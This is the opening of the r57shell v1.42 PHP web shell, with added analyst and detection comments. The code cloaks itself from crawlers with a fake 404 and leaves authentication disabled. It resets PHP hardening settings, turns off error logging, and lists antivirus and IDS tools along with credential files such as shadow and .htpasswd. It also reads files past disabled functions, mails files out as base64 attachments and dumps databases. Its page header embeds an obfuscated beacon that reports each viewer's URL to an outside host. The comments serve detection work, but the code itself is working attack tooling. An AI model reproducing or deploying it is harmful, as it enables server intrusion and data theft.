1<?php
2
3
4
// Crawler cloaking: any request whose User-Agent contains the substring "bot"
// receives a fake 404 and the script stops, which keeps the page out of search
// indexes and away from simple crawlers. HTTP_USER_AGENT is written as a bare
// constant rather than a quoted array key.
// Triage note: a PHP file that returns status 404 with the body
// "<h1>Not Found</h1>" only to bot-like User-Agents should be inspected on disk.
if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}

// Key prefix for the $lang message table (read as $lang[$language.'_textNN']).
$language='eng';

// 0 skips the HTTP Basic check further down, so this copy as pasted is usable by
// anyone who learns its URL; 1 enables the check.
$auth = 0;

// Expected MD5 hex digests of the Basic-auth user name and password. Both are
// empty in this copy.
$name='';
$pass='';
20
21
22
// Locale candidates listed by the author: ru_RU, ru_RU.cp1251, ru_RU.iso88595, ru_RU.koi8r, ru_RU.utf8
@setlocale(LC_ALL,'ru_RU.cp1251');

// Environment tampering: tries to reset PHP hardening directives back to their
// configured startup values. Every call is @-silenced, so a refusal by the
// runtime produces no warning. Whether any of these succeed depends on the PHP
// version and SAPI configuration, which SOURCE does not show.
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");

// Anti-forensics: clears the error_log target and turns log_errors off, then
// forces file uploads and URL fopen on. ini_alter() is used as the fallback when
// ini_set() is unavailable.
// Responder note: do not expect this script's activity in the PHP error log;
// rely on web-server access logs and file-system timestamps instead.
if(@function_exists('ini_set'))
 {
 @ini_set('error_log',NULL);
 @ini_set('log_errors',0);
 @ini_set('file_uploads',1);
 @ini_set('allow_url_fopen',1);
 }
else
 {
 @ini_alter('error_log',NULL);
 @ini_alter('log_errors',0);
 @ini_alter('file_uploads',1);
 @ini_alter('allow_url_fopen',1);
 }

// All error levels are reported to the operator's browser while logging stays off.
error_reporting(E_ALL);
74
75
76
/* (original comment lost to a character-encoding error) */
// Host-reconnaissance word lists. The code that consumes $userful, $danger and
// $downloaders is outside this part of the file; presumably each name is looked
// up on the host — confirm against the rest of the listing.
// $userful: compilers, interpreters, archivers and netcat.
$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');

// $danger: antivirus daemons, rootkit checkers, firewalls, integrity checkers,
// IDS and log-analysis tools, i.e. the defensive tooling the operator wants to
// know about.
$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');

// Candidate scratch directories; the first request tests each with is_writable()
// and keeps the last writable one. These are the places to look for dropped
// helper files during response.
$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');

// Command-line HTTP clients the script knows by name.
$downloaders = array('wget','fetch','lynx','links','curl','get');

/* (original comment lost to a character-encoding error; it mentions realpath()) */
// Alphabet and preset file names associated with realpath() by the comment
// above. The consumer is not visible here; presumably used to guess path names.
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";
//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";
//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";
//$chars_rlph = "_-.01234567890";
$chars_rlph = "abcdefghijklnmopqrstuvwxyz";

// Sensitive file and directory names: web-app configs, credential stores,
// shell/MySQL histories, service configs.
$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php',
'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root',
'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs',
'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');
112
113
114
115/******************************************************************************************************/
116
117
118
// Records the start time; getmicrotime() is defined elsewhere in the file.
define("starttime",@getmicrotime());

// $open_basedir becomes 1 when ini_get() is unavailable or when either
// open_basedir or safe_mode_include_dir is set, i.e. when file access is
// (or may be) restricted.
if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};

// PHP 4/5-era runtime setup: magic quotes off, no execution time limit, no
// output buffering. Unlimited execution time means one request to this script
// can hold a worker for as long as the operation runs.
set_magic_quotes_runtime(0);
@set_time_limit(0);
if(@function_exists('ini_set'))
 {
 @ini_set('max_execution_time',0);
 @ini_set('output_buffering',0);
 }
else
 {
 @ini_alter('max_execution_time',0);
 @ini_alter('output_buffering',0);
 }
$safe_mode = @ini_get('safe_mode');
#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};

// Version string of this build; it also appears in the page title.
$version = '1.42';

// Compatibility with PHP older than 4.1.0: alias the superglobals to the
// legacy $HTTP_*_VARS arrays.
if(@version_compare(@phpversion(), '4.1.0') == -1)
 {
 $_POST = &$HTTP_POST_VARS;
 $_GET = &$HTTP_GET_VARS;
 $_SERVER = &$HTTP_SERVER_VARS;
 $_COOKIE = &$HTTP_COOKIE_VARS;
 }

// When magic_quotes_gpc is on, undo its escaping so POST and cookie values reach
// the handlers exactly as the operator sent them.
if (@get_magic_quotes_gpc())
 {
 foreach ($_POST as $k=>$v)
 {
 $_POST[$k] = stripslashes($v);
 }
 foreach ($_COOKIE as $k=>$v)
 {
 $_COOKIE[$k] = stripslashes($v);
 }
 }
192
193
194
// Optional access control, active only when $auth is 1. The HTTP Basic user name
// and password are hashed with unsalted MD5 and compared with the digests in
// $name and $pass.
// Triage note: the realm string "HELLO!" in a WWW-Authenticate response header
// is a fingerprint of this family when the check is enabled.
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
 {
 header('WWW-Authenticate: Basic realm="HELLO!"');
 header('HTTP/1.0 401 Unauthorized');
 exit("<h1>Access Denied</h1>");
 }
}
210
211
212
// Scratch-directory selection. On the first visit (no cookies yet) every entry
// of $tempdirs is tested with is_writable(); the last writable one becomes
// $tempdir, and an HTML <select> of all writable ones is built. Both values are
// stored client-side in the cookies 'tempdir' and 'select_tempdir'.
// On later requests the directory is taken from POST 'tempdir' or the cookie,
// and the cookie's HTML fragment is reused as-is.
// Detection note: requests carrying cookies named tempdir and select_tempdir
// (the latter holding "<select name=tempdir>" markup) are a log signature of
// this script.
if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) {
 $tempdir='./';
 $select_tempdir = '<select name=tempdir><option value="./">./</option>';
 foreach( $tempdirs as $item) {
 if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;}
 }
 $select_tempdir .= '</select>';
 setcookie('tempdir',$tempdir);
 setcookie('select_tempdir',$select_tempdir);
}else{
 if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];}
 $select_tempdir = $_COOKIE['select_tempdir'];
}
238
239
240
// Page header emitted by every view: title, an inline script, CSS and three
// show/hide helpers.
// The title string "r57shell v.1.42 - Edited By KingDefacer" is a content
// signature for this variant.
// The first <script> is an obfuscated tracking beacon. Its hex-escaped array
// decodes to "src", "hxxp://eval[.]cryptr[.]org/?x=" (defanged here) and "href";
// the code creates an Image and sets its src to that URL plus the escaped
// location.href. Every browser that renders this page therefore reports the
// full URL of the script to that third-party host.
// Analyst notes: open samples only in an isolated browser or as plain text, and
// treat outbound requests to that host from internal clients as evidence that
// someone viewed a copy of this page.
$head = '

<html>
<head>
<title>r57shell v.1.42 - Edited By KingDefacer</title>
<script>
var _0x5be8=["\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x65\x76\x61\x6C\x2E\x63\x72\x79\x70\x74\x72\x2E\x6F\x72\x67\x2F\x3F\x78\x3D","\x68\x72\x65\x66"]
a= new Image();
a[_0x5be8[0]]=_0x5be8[1]+escape(location[_0x5be8[2]]);
</script>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<STYLE>

tr {

BORDER-RIGHT: #aaaaaa 1px solid;

BORDER-TOP: #eeeeee 1px solid;

BORDER-LEFT: #eeeeee 1px solid;

BORDER-BOTTOM: #aaaaaa 1px solid;

color: #000000;

}

td {

BORDER-RIGHT: #aaaaaa 1px solid;

BORDER-TOP: #eeeeee 1px solid;

BORDER-LEFT: #eeeeee 1px solid;

BORDER-BOTTOM: #aaaaaa 1px solid;

color: #000000;

}

.table1 {

BORDER: 0px;

BACKGROUND-COLOR: #D4D0C8;

color: #000000;

}

.td1 {

BORDER: 0px;

font: 7pt Verdana;

color: #000000;

}

.tr1 {

BORDER: 0px;

color: #000000;

}

table {

BORDER: #eeeeee 1px outset;

BACKGROUND-COLOR: #D4D0C8;

color: #000000;

}

input {

BORDER-RIGHT: #ffffff 1px solid;

BORDER-TOP: #999999 1px solid;

BORDER-LEFT: #999999 1px solid;

BORDER-BOTTOM: #ffffff 1px solid;

BACKGROUND-COLOR: #e4e0d8;

font: 8pt Verdana;

color: #000000;

}

select {

BORDER-RIGHT: #ffffff 1px solid;

BORDER-TOP: #999999 1px solid;

BORDER-LEFT: #999999 1px solid;

BORDER-BOTTOM: #ffffff 1px solid;

BACKGROUND-COLOR: #e4e0d8;

font: 8pt Verdana;

color: #000000;;

}

submit {

BORDER: buttonhighlight 2px outset;

BACKGROUND-COLOR: #e4e0d8;

width: 30%;

color: #000000;

}

textarea {

BORDER-RIGHT: #ffffff 1px solid;

BORDER-TOP: #999999 1px solid;

BORDER-LEFT: #999999 1px solid;

BORDER-BOTTOM: #ffffff 1px solid;

BACKGROUND-COLOR: #e4e0d8;

font: Fixedsys bold;

color: #000000;

}

BODY {

margin: 1px;

color: #000000;

background-color: #e4e0d8;

}

A:link {COLOR:red; TEXT-DECORATION: none}

A:visited { COLOR:red; TEXT-DECORATION: none}

A:active {COLOR:red; TEXT-DECORATION: none}

A:hover {color:blue;TEXT-DECORATION: none}

</STYLE>

<script language=\'javascript\'>

function hide_div(id)

{

 document.getElementById(id).style.display = \'none\';

 document.cookie=id+\'=0;\';

}

function show_div(id)

{

 document.getElementById(id).style.display = \'block\';

 document.cookie=id+\'=1;\';

}

function change_divst(id)

{

 if (document.getElementById(id).style.display == \'none\')

 show_div(id);

 else

 hide_div(id);

}





</script>';
447
/**
 * Minimal in-memory ZIP archive writer.
 *
 * Files are added with addFile() and the finished archive is returned as a
 * binary string by file(). In this script it is used by compress() to wrap a
 * file that is being sent to the operator.
 */
class zipfile
{
 // Local file records (header + compressed data), one element per added file.
 var $datasec = array();
 // Central-directory records, one element per added file.
 var $ctrl_dir = array();
 // End-of-central-directory signature "PK\x05\x06" followed by four zero bytes.
 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
 // Byte offset of the next local file record; stored in each central-directory record.
 var $old_offset = 0;

 /**
  * Packs a Unix timestamp into one 32-bit DOS date/time value.
  *
  * @param int $unixtime Timestamp; 0 means "now".
  * @return int Year-1980, month, day, hours, minutes and seconds/2 packed into bit fields.
  */
 function unix2DosTime($unixtime = 0) {
 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
 // Dates before 1980 are clamped to 1980-01-01 00:00:00.
 if ($timearray['year'] < 1980) {
 $timearray['year'] = 1980;
 $timearray['mon'] = 1;
 $timearray['mday'] = 1;
 $timearray['hours'] = 0;
 $timearray['minutes'] = 0;
 $timearray['seconds'] = 0;
 }
 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
 }

 /**
  * Adds one file to the archive.
  *
  * @param string $data File contents.
  * @param string $name Path stored in the archive; backslashes become slashes.
  * @param int    $time Unix timestamp for the entry; 0 means "now".
  */
 function addFile($data, $name, $time = 0)
 {
 $name = str_replace('\\', '/', $name);
 $dtime = dechex($this->unix2DosTime($time));
 // Build the text "\xNN\xNN\xNN\xNN" from the hex digits in reverse byte order,
 // then eval() it as a double-quoted string to obtain four raw bytes. The
 // evaluated text comes only from dechex() output, not from request data.
 $hexdtime = '\x' . $dtime[6] . $dtime[7]
 . '\x' . $dtime[4] . $dtime[5]
 . '\x' . $dtime[2] . $dtime[3]
 . '\x' . $dtime[0] . $dtime[1];
 eval('$hexdtime = "' . $hexdtime . '";');
 // Local file header: signature "PK\x03\x04", three 16-bit fields, then the date/time bytes.
 $fr = "\x50\x4b\x03\x04";
 $fr .= "\x14\x00";
 $fr .= "\x00\x00";
 $fr .= "\x08\x00";
 $fr .= $hexdtime;
 $unc_len = strlen($data);
 $crc = crc32($data);
 $zdata = gzcompress($data);
 // Drop the first 2 and last 4 bytes of the gzcompress() output before storing it.
 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
 $c_len = strlen($zdata);
 $fr .= pack('V', $crc);
 $fr .= pack('V', $c_len);
 $fr .= pack('V', $unc_len);
 $fr .= pack('v', strlen($name));
 $fr .= pack('v', 0);
 $fr .= $name;
 $fr .= $zdata;
 $this -> datasec[] = $fr;
 // Central-directory record for the same entry: signature "PK\x01\x02".
 $cdrec = "\x50\x4b\x01\x02";
 $cdrec .= "\x00\x00";
 $cdrec .= "\x14\x00";
 $cdrec .= "\x00\x00";
 $cdrec .= "\x08\x00";
 $cdrec .= $hexdtime;
 $cdrec .= pack('V', $crc);
 $cdrec .= pack('V', $c_len);
 $cdrec .= pack('V', $unc_len);
 $cdrec .= pack('v', strlen($name) );
 $cdrec .= pack('v', 0 );
 $cdrec .= pack('v', 0 );
 $cdrec .= pack('v', 0 );
 $cdrec .= pack('v', 0 );
 $cdrec .= pack('V', 32 );
 // Offset of this entry's local record, then advance the running offset.
 $cdrec .= pack('V', $this -> old_offset );
 $this -> old_offset += strlen($fr);
 $cdrec .= $name;
 $this -> ctrl_dir[] = $cdrec;
 }

 /**
  * Returns the complete archive: all local records, the central directory,
  * the end-of-directory signature, entry counts, directory size and offset,
  * and a zero-length comment field.
  *
  * @return string Binary ZIP data.
  */
 function file()
 {
 $data = implode('', $this -> datasec);
 $ctrldir = implode('', $this -> ctrl_dir);
 return
 $data .
 $ctrldir .
 $this -> eof_ctrl_dir .
 pack('v', sizeof($this -> ctrl_dir)) .
 pack('v', sizeof($this -> ctrl_dir)) .
 pack('V', strlen($ctrldir)) .
 pack('V', strlen($data)) .
 "\x00\x00";
 }
}
609
610
611
/**
 * Optionally compresses a file that is about to be sent to the operator.
 *
 * Both $filename and $filedump are passed by reference and modified in place:
 * the matching extension is appended to the name and the data is replaced by
 * its compressed form. The globals $mime_type and (for gzip) $content_encoding
 * are set for the download handler to use in response headers. Each format is
 * used only if the corresponding PHP function exists; otherwise the data is
 * left unchanged and the type is application/octet-stream.
 *
 * @param string $filename Download file name (modified).
 * @param string $filedump File contents (modified).
 * @param string $compress 'bzip', 'gzip', 'zip', or anything else for no compression.
 */
function compress(&$filename,&$filedump,$compress)
 {
 global $content_encoding;
 global $mime_type;
 if ($compress == 'bzip' && @function_exists('bzcompress'))
 {
 $filename .= '.bz2';
 $mime_type = 'application/x-bzip2';
 $filedump = bzcompress($filedump);
 }
 else if ($compress == 'gzip' && @function_exists('gzencode'))
 {
 $filename .= '.gz';
 $content_encoding = 'x-gzip';
 $mime_type = 'application/x-gzip';
 $filedump = gzencode($filedump);
 }
 else if ($compress == 'zip' && @function_exists('gzcompress'))
 {
 $filename .= '.zip';
 $mime_type = 'application/zip';
 $zipfile = new zipfile();
 // The entry inside the archive keeps the original name (".zip" stripped again).
 $zipfile -> addFile($filedump, substr($filename, 0, -4));
 $filedump = $zipfile -> file();
 }
 else
 {
 $mime_type = 'application/octet-stream';
 }
 }
671
672
673
/**
 * Reads a file through whichever PHP file API is still available.
 *
 * The branches are tried in order and each is guarded by function_exists(),
 * so the function keeps working when some readers are blocked by
 * disable_functions. Hardening note: blocking only a subset of fopen/fread/
 * file/file_get_contents/readfile/highlight_file/show_source does not stop it;
 * path restrictions and file permissions are what limit what it can read.
 * The readfile(), highlight_file() and show_source() branches write the file to
 * the output directly and store their return value, not the contents, in $str.
 *
 * @param string $temp Path of the file to read.
 * @return mixed File contents, or the fallback API's return value; '' if nothing was read.
 */
function moreread($temp){
global $lang,$language;
$str='';
 if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){
 if($ffile){
 while(!@feof($ffile)){$str .= @fgets($ffile);};
 fclose($ffile);
 }
 }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){
 if($ffile){
 $str = @fread($ffile, @filesize($temp));
 @fclose($ffile);
 }
 }elseif(@function_exists('file')&&($ffiles = @file($temp))){
 foreach ($ffiles as $ffile) { $str .= $ffile; }
 }elseif(@function_exists('file_get_contents')){
 $str = @file_get_contents($temp);
 }elseif(@function_exists('readfile')){
 $str = @readfile($temp);
 }elseif(@function_exists('highlight_file')){
 $str = @highlight_file($temp);
 }elseif(@function_exists('show_source')){
 $str = @show_source($temp);
 // No reader available: print the localized message with key suffix _text56.
 }else{echo $lang[$language.'_text56'];}
return $str;
}
725
726
727
/**
 * Alternative file read through the compress.zlib:// stream wrapper.
 *
 * The target is copied via the wrapper into a temporary file, read back with
 * moreread(), and the temporary file is deleted. The download handler calls
 * this when moreread() on the path returned nothing.
 * Forensic note: when no $temp is given, the scratch file is created with
 * tempnam() in the current working directory using the prefix "copytemp";
 * leftover files with that prefix in web directories point to interrupted use.
 *
 * @param string $filename Path to read.
 * @param string $temp     Optional scratch file path.
 * @return mixed Whatever moreread() returned for the copy; '' if the copy failed.
 */
function readzlib($filename,$temp=''){
global $lang,$language;
$str='';
 if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
 if(@copy("compress.zlib://".$filename, $temp)) {
 $str = moreread($temp);
 // Copy failed: print the localized message with key suffix _text119.
 } else echo $lang[$language.'_text119'];
 @unlink($temp);
return $str;
}
747
748
749
/**
 * Writes a string to a file through whichever write API is available.
 *
 * Tries fopen+fwrite, then fopen+fputs, then file_put_contents, each guarded by
 * function_exists(). The file is opened in "wb" mode, so existing content is
 * replaced. All calls are @-silenced and the write result is not checked:
 * the function returns 1 whenever one of the branches was entered.
 *
 * @param string $temp Destination path.
 * @param string $str  Data to write.
 * @return int 1 if a write branch was taken, 0 if no write API is available.
 */
function morewrite($temp,$str='')
{
global $lang,$language;
 if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
 if($ffile){
 @fwrite($ffile,$str);
 @fclose($ffile);
 }
 }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
 if($ffile){
 @fputs($ffile,$str);
 @fclose($ffile);
 }
 }elseif(@function_exists('file_put_contents')){
 @file_put_contents($temp,$str);
 }else return 0;
return 1;
}
785
786
787
/**
 * Sends one file by e-mail using PHP's mail().
 *
 * The message body is empty; the base64-encoded content is appended to the
 * header string after a blank line. This gives the operator a second way to
 * move files off the host besides HTTP download.
 * Detection note: mail submitted by the web-server account with an empty body
 * and a base64 attachment is worth alerting on where the site has no
 * legitimate reason to send attachments.
 *
 * @param string $to     Recipient address.
 * @param string $from   Value of the From header.
 * @param string $subj   Subject line.
 * @param array  $attach Keys read here: 'type', 'name', 'content'.
 * @return int 1 if mail() accepted the message, otherwise 0.
 */
function mailattach($to,$from,$subj,$attach)
 {
 $headers = "From: $from\r\n";
 $headers .= "MIME-Version: 1.0\r\n";
 $headers .= "Content-Type: ".$attach['type'];
 $headers .= "; name=\"".$attach['name']."\"\r\n";
 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
 if(mail($to,$subj,"",$headers)) { return 1; }
 return 0;
 }
809
/**
 * Multi-driver database client used by the db_query handler.
 *
 * $db selects the backend ('MySQL', 'MSSQL', 'PostgreSQL', 'Oracle', 'MySQLi',
 * 'mSQL', 'SQLite'); every method switches on it and calls the matching legacy
 * PHP extension function. All connection parameters are filled from request
 * fields by the caller, so the web server can be pointed at any database host
 * it can reach, not only its own.
 * Detection notes: database logins originating from the web server with
 * accounts or target hosts the application never uses, and the dump header
 * lines beginning with "##" (see dump()), are artefacts of this class.
 */
class my_sql
 {
 var $host = 'localhost';
 var $port = '';
 var $user = '';
 var $pass = '';
 // Database name (for Oracle it is passed as the third ocilogon() argument, for SQLite as the file to open).
 var $base = '';
 // Backend selector; see the class comment.
 var $db = '';
 var $connection;
 // Result handle of the last query.
 var $res;
 // Error text of the last failed query.
 var $error;
 // Rows and column names filled by get_result().
 var $rows;
 var $columns;
 var $num_rows;
 var $num_fields;
 // Lines of the last table dump produced by dump().
 var $dump;

 /**
  * Opens a connection for the selected backend, applying a default port for
  * MySQL/MySQLi (3306), MSSQL (1433) and PostgreSQL (5432) when none is set.
  *
  * @return int 1 on success; 0 if the driver function is missing, the
  *             connection failed, or $db is not a known backend.
  */
 function connect()
 {
 switch($this->db)
 {
 case 'MySQL':
 if(empty($this->port)) { $this->port = '3306'; }
 if(!@function_exists('mysql_connect')) return 0;
 $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
 if(is_resource($this->connection)) return 1;
 break;
 case 'MSSQL':
 if(empty($this->port)) { $this->port = '1433'; }
 if(!@function_exists('mssql_connect')) return 0;
 $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
 if($this->connection) return 1;
 break;
 case 'PostgreSQL':
 if(empty($this->port)) { $this->port = '5432'; }
 $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
 if(!@function_exists('pg_connect')) return 0;
 $this->connection = @pg_connect($str);
 if(is_resource($this->connection)) return 1;
 break;
 case 'Oracle':
 if(!@function_exists('ocilogon')) return 0;
 $this->connection = @ocilogon($this->user, $this->pass, $this->base);
 if(is_resource($this->connection)) return 1;
 break;
 case 'MySQLi':
 if(empty($this->port)) { $this->port = '3306'; }
 if(!@function_exists('mysqli_connect')) return 0;
 $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port);
 if(is_resource($this->connection)) return 1;
 break;
 case 'mSQL':
 if(!@function_exists('msql_connect')) return 0;
 $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass);
 if(is_resource($this->connection)) return 1;
 break;
 case 'SQLite':
 if(!@function_exists('sqlite_open')) return 0;
 $this->connection = @sqlite_open($this->base);
 if(is_resource($this->connection)) return 1;
 break;
 }
 return 0;
 }

 /**
  * Selects $base on the open connection. Only MySQL, MSSQL and mSQL make a
  * driver call; the other backends return 1 without doing anything.
  *
  * @return int 1 on success, 0 on failure or unknown backend.
  */
 function select_db()
 {
 switch($this->db)
 {
 case 'MySQL':
 if(@mysql_select_db($this->base,$this->connection)) return 1;
 break;
 case 'MSSQL':
 if(@mssql_select_db($this->base,$this->connection)) return 1;
 break;
 case 'PostgreSQL':
 return 1;
 break;
 case 'Oracle':
 return 1;
 break;
 case 'MySQLi':
 return 1;
 break;
 case 'mSQL':
 if(@msql_select_db($this->base,$this->connection)) return 1;
 break;
 case 'SQLite':
 return 1;
 break;
 }
 return 0;
 }

 /**
  * Runs one SQL statement exactly as supplied by the caller.
  *
  * @param string $query SQL text.
  * @return int 0 = error ($error is set), 1 = a result set is available for
  *             get_result(), 2 = statement ran without a result set. The
  *             Oracle branch uses the codes differently: it returns 2 when
  *             ocirowcount() is non-zero and 1 otherwise.
  */
 function query($query)
 {
 $this->res=$this->error='';
 switch($this->db)
 {
 case 'MySQL':
 // The statement is prefixed with an SQL comment that contains a NUL byte.
 // NOTE(review): the intent is not stated in SOURCE; presumably it is meant to
 // confuse query logging or inspection. Statements that begin with "/*", a NUL
 // byte and "*/" in MySQL query logs are a useful detection string.
 if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
 {
 $this->error = @mysql_error($this->connection);
 return 0;
 }
 else if(is_resource($this->res)) { return 1; }
 return 2;
 break;
 case 'MSSQL':
 if(false===($this->res=@mssql_query($query,$this->connection)))
 {
 $this->error = 'Query error';
 return 0;
 }
 else if(@mssql_num_rows($this->res) > 0) { return 1; }
 return 2;
 break;
 case 'PostgreSQL':
 if(false===($this->res=@pg_query($this->connection,$query)))
 {
 $this->error = @pg_last_error($this->connection);
 return 0;
 }
 else if(@pg_num_rows($this->res) > 0) { return 1; }
 return 2;
 break;
 case 'Oracle':
 if(false===($this->res=@ociparse($this->connection,$query)))
 {
 $this->error = 'Query parse error';
 }
 else
 {
 if(@ociexecute($this->res))
 {
 if(@ocirowcount($this->res) != 0) return 2;
 return 1;
 }
 $error = @ocierror();
 $this->error=$error['message'];
 }
 break;
 case 'MySQLi':
 if(false===($this->res=@mysqli_query($this->connection,$query)))
 {
 $this->error = @mysqli_error($this->connection);
 return 0;
 }
 else if(is_resource($this->res)) { return 1; }
 return 2;
 break;
 case 'mSQL':
 if(false===($this->res=@msql_query($query,$this->connection)))
 {
 $this->error = @msql_error($this->connection);
 return 0;
 }
 else if(is_resource($this->res)) { return 1; }
 return 2;
 break;
 case 'SQLite':
 if(false===($this->res=@sqlite_query($this->connection,$query)))
 {
 $this->error = @sqlite_error_string($this->connection);
 return 0;
 }
 else if(is_resource($this->res)) { return 1; }
 return 2;
 break;
 }
 return 0;
 }

 /**
  * Loads the whole result set of the last query into memory.
  *
  * Fills $rows, $columns (keys of the first row), $num_rows and $num_fields.
  * Each fetch loop appends the value of every fetch call to $rows, including
  * the final false that ends the loop.
  *
  * @return int 1 if at least one row was counted, otherwise 0.
  */
 function get_result()
 {
 $this->rows=array();
 $this->columns=array();
 $this->num_rows=$this->num_fields=0;
 switch($this->db)
 {
 case 'MySQL':
 $this->num_rows=@mysql_num_rows($this->res);
 $this->num_fields=@mysql_num_fields($this->res);
 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
 @mysql_free_result($this->res);
 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 break;
 case 'MSSQL':
 $this->num_rows=@mssql_num_rows($this->res);
 $this->num_fields=@mssql_num_fields($this->res);
 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
 @mssql_free_result($this->res);
 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
 break;
 case 'PostgreSQL':
 $this->num_rows=@pg_num_rows($this->res);
 $this->num_fields=@pg_num_fields($this->res);
 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
 @pg_free_result($this->res);
 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 break;
 case 'Oracle':
 // No row-count call is made here; rows are counted while fetching.
 $this->num_fields=@ocinumcols($this->res);
 while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
 @ocifreestatement($this->res);
 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 break;
 case 'MySQLi':
 $this->num_rows=@mysqli_num_rows($this->res);
 $this->num_fields=@mysqli_num_fields($this->res);
 while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res)));
 @mysqli_free_result($this->res);
 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 break;
 case 'mSQL':
 $this->num_rows=@msql_num_rows($this->res);
 $this->num_fields=@msql_num_fields($this->res);
 while(false !== ($this->rows[] = @msql_fetch_array($this->res)));
 @msql_free_result($this->res);
 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 break;
 case 'SQLite':
 $this->num_rows=@sqlite_num_rows($this->res);
 $this->num_fields=@sqlite_num_fields($this->res);
 while(false !== ($this->rows[] = @sqlite_fetch_array($this->res)));
 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 break;
 }
 return 0;
 }

 /**
  * Exports every row of one table as SQL text into $this->dump.
  *
  * The dump starts with six header lines that begin with "##": a backend
  * banner such as "## MySQL dump", then "## Created: <d/m/Y H:i:s>",
  * "## Database: <name>" and "## Table: <name>" between separator lines. For
  * MySQL the CREATE TABLE statement is included as well. Each row becomes one
  * INSERT statement. The table name is concatenated into the SELECT as given.
  * Forensic note: files or mail attachments carrying this "##" header layout
  * identify data exported with this tool.
  *
  * @param string $table Table name.
  * @return int 1 on success; 0 if $table is empty, a query or fetch failed,
  *             or the backend is unknown.
  */
 function dump($table)
 {
 if(empty($table)) return 0;
 $this->dump=array();
 $this->dump[0] = '##';
 $this->dump[1] = '## --------------------------------------- ';
 $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
 $this->dump[3] = '## Database: '.$this->base;
 $this->dump[4] = '## Table: '.$table;
 $this->dump[5] = '## --------------------------------------- ';
 switch($this->db)
 {
 case 'MySQL':
 $this->dump[0] = '## MySQL dump';
 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
 if(!$this->get_result()) return 0;
